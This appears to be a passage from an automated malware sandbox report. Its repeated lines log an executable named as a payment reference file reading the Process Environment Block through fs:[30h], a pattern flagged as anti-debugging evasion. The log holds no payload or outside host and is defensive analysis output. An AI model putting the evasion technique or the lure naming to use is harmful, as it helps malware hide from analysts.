Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov ecx, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov ecx, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov ecx, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov eax, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E10E mov ecx, dword ptr fs:[00000030h]	4_2_01B6E10E
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94164 mov eax, dword ptr fs:[00000030h]	4_2_01B94164
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B94164 mov eax, dword ptr fs:[00000030h]	4_2_01B94164
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B58158 mov eax, dword ptr fs:[00000030h]	4_2_01B58158
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B54144 mov eax, dword ptr fs:[00000030h]	4_2_01B54144
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B54144 mov eax, dword ptr fs:[00000030h]	4_2_01B54144
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B54144 mov ecx, dword ptr fs:[00000030h]	4_2_01B54144
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B54144 mov eax, dword ptr fs:[00000030h]	4_2_01B54144
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B54144 mov eax, dword ptr fs:[00000030h]	4_2_01B54144
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC6154 mov eax, dword ptr fs:[00000030h]	4_2_01AC6154
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC6154 mov eax, dword ptr fs:[00000030h]	4_2_01AC6154
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABC156 mov eax, dword ptr fs:[00000030h]	4_2_01ABC156
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B860B8 mov eax, dword ptr fs:[00000030h]	4_2_01B860B8
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B860B8 mov ecx, dword ptr fs:[00000030h]	4_2_01B860B8
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB80A0 mov eax, dword ptr fs:[00000030h]	4_2_01AB80A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B580A8 mov eax, dword ptr fs:[00000030h]	4_2_01B580A8
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC208A mov eax, dword ptr fs:[00000030h]	4_2_01AC208A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B020F0 mov ecx, dword ptr fs:[00000030h]	4_2_01B020F0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC80E9 mov eax, dword ptr fs:[00000030h]	4_2_01AC80E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABA0E3 mov ecx, dword ptr fs:[00000030h]	4_2_01ABA0E3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B460E0 mov eax, dword ptr fs:[00000030h]	4_2_01B460E0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABC0F0 mov eax, dword ptr fs:[00000030h]	4_2_01ABC0F0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B420DE mov eax, dword ptr fs:[00000030h]	4_2_01B420DE
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B56030 mov eax, dword ptr fs:[00000030h]	4_2_01B56030
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABA020 mov eax, dword ptr fs:[00000030h]	4_2_01ABA020
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABC020 mov eax, dword ptr fs:[00000030h]	4_2_01ABC020
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B44000 mov ecx, dword ptr fs:[00000030h]	4_2_01B44000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B62000 mov eax, dword ptr fs:[00000030h]	4_2_01B62000
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE016 mov eax, dword ptr fs:[00000030h]	4_2_01ADE016
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE016 mov eax, dword ptr fs:[00000030h]	4_2_01ADE016
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE016 mov eax, dword ptr fs:[00000030h]	4_2_01ADE016
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE016 mov eax, dword ptr fs:[00000030h]	4_2_01ADE016
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEC073 mov eax, dword ptr fs:[00000030h]	4_2_01AEC073
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B46050 mov eax, dword ptr fs:[00000030h]	4_2_01B46050
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC2050 mov eax, dword ptr fs:[00000030h]	4_2_01AC2050
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE438F mov eax, dword ptr fs:[00000030h]	4_2_01AE438F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE438F mov eax, dword ptr fs:[00000030h]	4_2_01AE438F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABE388 mov eax, dword ptr fs:[00000030h]	4_2_01ABE388
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABE388 mov eax, dword ptr fs:[00000030h]	4_2_01ABE388
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABE388 mov eax, dword ptr fs:[00000030h]	4_2_01ABE388
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB8397 mov eax, dword ptr fs:[00000030h]	4_2_01AB8397
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB8397 mov eax, dword ptr fs:[00000030h]	4_2_01AB8397
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB8397 mov eax, dword ptr fs:[00000030h]	4_2_01AB8397
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]	4_2_01AD03E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]	4_2_01AD03E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]	4_2_01AD03E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]	4_2_01AD03E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]	4_2_01AD03E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]	4_2_01AD03E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]	4_2_01AD03E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD03E9 mov eax, dword ptr fs:[00000030h]	4_2_01AD03E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF63FF mov eax, dword ptr fs:[00000030h]	4_2_01AF63FF
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE3F0 mov eax, dword ptr fs:[00000030h]	4_2_01ADE3F0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE3F0 mov eax, dword ptr fs:[00000030h]	4_2_01ADE3F0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADE3F0 mov eax, dword ptr fs:[00000030h]	4_2_01ADE3F0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B643D4 mov eax, dword ptr fs:[00000030h]	4_2_01B643D4
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B643D4 mov eax, dword ptr fs:[00000030h]	4_2_01B643D4
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA3C0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA3C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA3C0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA3C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA3C0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA3C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA3C0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA3C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA3C0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA3C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA3C0 mov eax, dword ptr fs:[00000030h]	4_2_01ACA3C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC83C0 mov eax, dword ptr fs:[00000030h]	4_2_01AC83C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC83C0 mov eax, dword ptr fs:[00000030h]	4_2_01AC83C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC83C0 mov eax, dword ptr fs:[00000030h]	4_2_01AC83C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC83C0 mov eax, dword ptr fs:[00000030h]	4_2_01AC83C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E3DB mov eax, dword ptr fs:[00000030h]	4_2_01B6E3DB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E3DB mov eax, dword ptr fs:[00000030h]	4_2_01B6E3DB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E3DB mov ecx, dword ptr fs:[00000030h]	4_2_01B6E3DB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6E3DB mov eax, dword ptr fs:[00000030h]	4_2_01B6E3DB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B463C0 mov eax, dword ptr fs:[00000030h]	4_2_01B463C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7C3CD mov eax, dword ptr fs:[00000030h]	4_2_01B7C3CD
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B98324 mov eax, dword ptr fs:[00000030h]	4_2_01B98324
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B98324 mov ecx, dword ptr fs:[00000030h]	4_2_01B98324
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B98324 mov eax, dword ptr fs:[00000030h]	4_2_01B98324
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B98324 mov eax, dword ptr fs:[00000030h]	4_2_01B98324
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA30B mov eax, dword ptr fs:[00000030h]	4_2_01AFA30B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA30B mov eax, dword ptr fs:[00000030h]	4_2_01AFA30B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFA30B mov eax, dword ptr fs:[00000030h]	4_2_01AFA30B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABC310 mov ecx, dword ptr fs:[00000030h]	4_2_01ABC310
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE0310 mov ecx, dword ptr fs:[00000030h]	4_2_01AE0310
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6437C mov eax, dword ptr fs:[00000030h]	4_2_01B6437C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B68350 mov ecx, dword ptr fs:[00000030h]	4_2_01B68350
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4035C mov eax, dword ptr fs:[00000030h]	4_2_01B4035C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4035C mov eax, dword ptr fs:[00000030h]	4_2_01B4035C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4035C mov eax, dword ptr fs:[00000030h]	4_2_01B4035C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4035C mov ecx, dword ptr fs:[00000030h]	4_2_01B4035C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4035C mov eax, dword ptr fs:[00000030h]	4_2_01B4035C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B4035C mov eax, dword ptr fs:[00000030h]	4_2_01B4035C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8A352 mov eax, dword ptr fs:[00000030h]	4_2_01B8A352
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B9634F mov eax, dword ptr fs:[00000030h]	4_2_01B9634F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B42349 mov eax, dword ptr fs:[00000030h]	4_2_01B42349
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD02A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD02A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD02A0 mov eax, dword ptr fs:[00000030h]	4_2_01AD02A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B562A0 mov eax, dword ptr fs:[00000030h]	4_2_01B562A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B562A0 mov ecx, dword ptr fs:[00000030h]	4_2_01B562A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B562A0 mov eax, dword ptr fs:[00000030h]	4_2_01B562A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B562A0 mov eax, dword ptr fs:[00000030h]	4_2_01B562A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B562A0 mov eax, dword ptr fs:[00000030h]	4_2_01B562A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B562A0 mov eax, dword ptr fs:[00000030h]	4_2_01B562A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE284 mov eax, dword ptr fs:[00000030h]	4_2_01AFE284
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE284 mov eax, dword ptr fs:[00000030h]	4_2_01AFE284
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B40283 mov eax, dword ptr fs:[00000030h]	4_2_01B40283
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B40283 mov eax, dword ptr fs:[00000030h]	4_2_01B40283
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B40283 mov eax, dword ptr fs:[00000030h]	4_2_01B40283
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD02E1 mov eax, dword ptr fs:[00000030h]	4_2_01AD02E1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD02E1 mov eax, dword ptr fs:[00000030h]	4_2_01AD02E1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD02E1 mov eax, dword ptr fs:[00000030h]	4_2_01AD02E1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA2C3 mov eax, dword ptr fs:[00000030h]	4_2_01ACA2C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA2C3 mov eax, dword ptr fs:[00000030h]	4_2_01ACA2C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA2C3 mov eax, dword ptr fs:[00000030h]	4_2_01ACA2C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA2C3 mov eax, dword ptr fs:[00000030h]	4_2_01ACA2C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ACA2C3 mov eax, dword ptr fs:[00000030h]	4_2_01ACA2C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B962D6 mov eax, dword ptr fs:[00000030h]	4_2_01B962D6
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB823B mov eax, dword ptr fs:[00000030h]	4_2_01AB823B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AB826B mov eax, dword ptr fs:[00000030h]	4_2_01AB826B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B70274 mov eax, dword ptr fs:[00000030h]	4_2_01B70274
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC4260 mov eax, dword ptr fs:[00000030h]	4_2_01AC4260
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC4260 mov eax, dword ptr fs:[00000030h]	4_2_01AC4260
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC4260 mov eax, dword ptr fs:[00000030h]	4_2_01AC4260
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B9625D mov eax, dword ptr fs:[00000030h]	4_2_01B9625D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7A250 mov eax, dword ptr fs:[00000030h]	4_2_01B7A250
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7A250 mov eax, dword ptr fs:[00000030h]	4_2_01B7A250
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC6259 mov eax, dword ptr fs:[00000030h]	4_2_01AC6259
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B48243 mov eax, dword ptr fs:[00000030h]	4_2_01B48243
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B48243 mov ecx, dword ptr fs:[00000030h]	4_2_01B48243
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABA250 mov eax, dword ptr fs:[00000030h]	4_2_01ABA250
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B405A7 mov eax, dword ptr fs:[00000030h]	4_2_01B405A7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B405A7 mov eax, dword ptr fs:[00000030h]	4_2_01B405A7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B405A7 mov eax, dword ptr fs:[00000030h]	4_2_01B405A7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE45B1 mov eax, dword ptr fs:[00000030h]	4_2_01AE45B1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE45B1 mov eax, dword ptr fs:[00000030h]	4_2_01AE45B1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AF4588 mov eax, dword ptr fs:[00000030h]	4_2_01AF4588
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC2582 mov eax, dword ptr fs:[00000030h]	4_2_01AC2582
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC2582 mov ecx, dword ptr fs:[00000030h]	4_2_01AC2582
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFE59C mov eax, dword ptr fs:[00000030h]	4_2_01AFE59C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFC5ED mov eax, dword ptr fs:[00000030h]	4_2_01AFC5ED
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AFC5ED mov eax, dword ptr fs:[00000030h]	4_2_01AFC5ED
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE5E7 mov eax, dword ptr fs:[00000030h]	4_2_01AEE5E7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE5E7 mov eax, dword ptr fs:[00000030h]	4_2_01AEE5E7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE5E7 mov eax, dword ptr fs:[00000030h]	4_2_01AEE5E7
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEE5E7 mov eax, dword ptr fs:[00000030h]	4_2_01AEE5E7
